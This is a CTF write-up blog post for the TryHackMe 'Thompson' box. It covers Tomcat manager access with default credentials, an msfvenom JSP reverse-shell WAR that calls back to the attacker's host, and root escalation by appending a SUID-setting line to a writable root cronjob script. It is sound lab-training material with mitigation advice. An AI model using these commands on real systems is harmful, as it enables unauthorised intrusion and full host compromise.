Open in app

Sign in

Write

Sign in

Thompson Write-Up

Fahri Korkmaz
3 min readMar 21, 2021

Description

Thompson is a boot2root CTF on TryHackMe. It has “Easy” difficulty. Initial access has been done through uploading a reverse shell. Privilege escalation to root could be done through a misconfigured cronjob.

Enumeration

After running a Nmap scan we can see that port 22, 8009 and 8080 is running. On port 8080 Tomcat 8.5.5 is running.

nmap -sC -sV -O -oN nmap/scripts 10.10.39.116

The landing page of the Tomcat server shows us the default Tomcat page.

We can log into the Management portal via default credentials.

Now we have enough privileges to upload a reverse shell.

Initial access

The reverse shell was created with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war > shell.war

Now we can upload the reverse shell through the web portal.

The reverse shell should be uploaded.

Before navigating to /shell we have to start a listener. For this purpose I will use pwncat.

pc -lp 4444

Next we can navigate to “http://10.10.39.116:8080/shell/” and get a shell on the box as the tomcat user.

We can now navigate to /home/jack and get the user flag.

Privilege Escalation

Inside Jack’s home folder there are two interesting files. The first one is “id.sh”. It is a bash script that runs the id command and writes the outputs into “test.txt”. Reading “test.txt” shows us that this script was run by root.

Based on these information we can assume that a cronjob is running. To validate our assumption we can read the /etc/crontab file. And indeed the “id.sh” command is run as root inside a cronjob.

We also have write privileges for the file “id.sh”. This means we can now inject our code into the “id.sh” file and get a root shell. I will add the SUID bit to /bin/bash.

echo ‘chmod +s /bin/bash’ >> id.sh

After waiting for a minute, bash should have theSUID bit set.

Finally we can spawn a root shell and read the root flag.

/bin/bash -p

Mitigation

Default passwords should be changed as soon as possible. Furthermore the Tomcat version is a very old one. So it should be updated if possible. Also scripts that are run by a cronjob, should only be writable by the user that is running the cronjob.

Tryhackme
Ctf Writeup
Ctf
Tomcat
Cronjob

--

--

Fahri Korkmaz

Written by Fahri Korkmaz

258 Followers

Red Teaming | Penetration Testing

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams